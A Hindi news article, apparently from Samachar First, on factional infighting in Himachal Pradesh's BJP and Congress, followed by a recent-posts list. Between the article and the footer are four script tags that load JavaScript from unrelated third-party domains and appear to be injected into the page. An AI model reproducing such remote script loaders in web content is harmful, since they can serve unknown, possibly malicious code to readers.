हिमाचल में दोनों ही मुख्य दलों में घमासान, प्रदेश की ठंडी फ़िज़ाओं में सियासी पारा उफ़ान पर

<p>हिमाचल प्रदेश में जैसे-जैसे शीत लहर बढ़ रही है वैसे-वैसे सियासी गलियारों में पारा चढ़ा हुआ है। प्रदेश के दोनों मुख्य दलों कांग्रेस एवम भाजपा के बीच सब कुछ ठीक नहीं चल रहा है। दोनों दलों की आपसी लड़ाई खुलकर सामने आ गई है। चलिए पहले बात कर लेते हैं सत्ताधारी भाजपा की, भाजपा वैसे तो सरकार चला रही है लेकिन भाजपा में सबकुछ ठीक चल रहा ये कहना सही नहीं होगा। क्योंकि प्रदेश के सबसे बड़े जिला कांगड़ा में पत्र बम आजकल भूचाल खड़ा किए हुए है।</p>

<p>मंत्रिमंडल विस्तार के साथ फ़ेरबदल की संभावनाओं के बीच कई तरह की राजनीतिक चर्चाओं का बाज़ार गर्म है। बात तो मंत्रियों को हटाने की भी सामने आई थी लेकिन यदि ऐसा होता है तो क्या भाजपा में अंदरखाते बगावत की चिंगारी नहीं सुलगेगी। वहीं, भाजपा के नए प्रदेशाध्यक्ष को लेकर भी अभी तस्वीर साफ़ नहीं हो पाई है। भाजपा को 15 दिसंबर तक नया अध्यक्ष मिल जाएगा। ये अध्यक्ष मुख्यमंत्री का करीबी होगा या फ़िर अन्य धड़े का इसपर भी सबकी निगाहें टिकी हुई हैं।</p>

<p>उधर कांग्रेस पार्टी की लड़ाई तो जगज़ाहिर है। कांग्रेस पार्टी की आपसी खींचतान के बीच आलाकमान ने प्रदेश की पीसीसी, डीसीसी और बीसीसी को भंग कर दिया है। अभी तक ये साफ नहीं हो पाया है कि असल में ऐसा क्यों किया गया। कुलदीप राठौर के समर्थक कहते हैं कि ये सब कुलदीप राठौर के कहने पर किया गया क्योंकि पुरानी कार्यकारिणी को चला पाना उन्हें मुश्किल हो रहा था। दूसरी ओर विरोधी धड़ा कह रहा है कि अधिकतर कार्यकारिणी को कुलदीप राठौर ने बदल डाला था। बाबजूद इसके चुनावों में कांग्रेस को शर्मनाक हार का सामना करना पड़ा। आलाकमान प्रदेश में अध्यक्ष को भी बदल सकती है और किसी अनुभवी व्यक्ति को प्रदेशाध्यक्ष बनाना चाहती है। अब दोनों ही दलों में मचे घमासान का क्या नतीजा निकलता है इसके लिए इंतजार करना पड़ेगा।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1574483046869″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Baba Siddique Murder Case: बोन टेस्ट में खुलासा, आरोपी धर्मराज कश्यप नाबालिग नहीं

Mumbai:  महाराष्ट्र के पूर्व मंत्री और राष्ट्रवादी कांग्रेस पार्टी (राकांपा) नेता बाबा सिद्दीकी की हत्या…

12 mins ago

16 अक्टूबर को मनाएं शरद पूर्णिमा, जानें पूजा विधि और व्रत के लाभ

Sharad Purnima Vrat 2024:  हिंदू धर्म में आश्विन मास की शुक्ल पक्ष की चतुर्दशी को…

22 mins ago

National : 10+2 पास युवाओं के लिए सेना में अफसर बनने का मौका, आवेदन शुरू

Indian Army TES 53 Recruitment: भारतीय सेना में अफसर बनने का सपना देखने वाले युवाओं…

33 mins ago

14 अक्टूबर 2024, जानें कैसा रहेगा सोमवार

मेष (Aries) आज का दिन आपके लिए लाभकारी रहेगा। बिजनेस में फायदे की संभावना है,…

47 mins ago

भारत में सड़क दुर्घटनाओं को रोकने के लिए केंद्रीय कानून जरूरी: शांता कुमार

Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…

12 hours ago

Himachal: सीएम सुक्खू ने ईवीएम पर उठाए सवाल, बैलेट पेपर से चुनाव की मांग

Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…

13 hours ago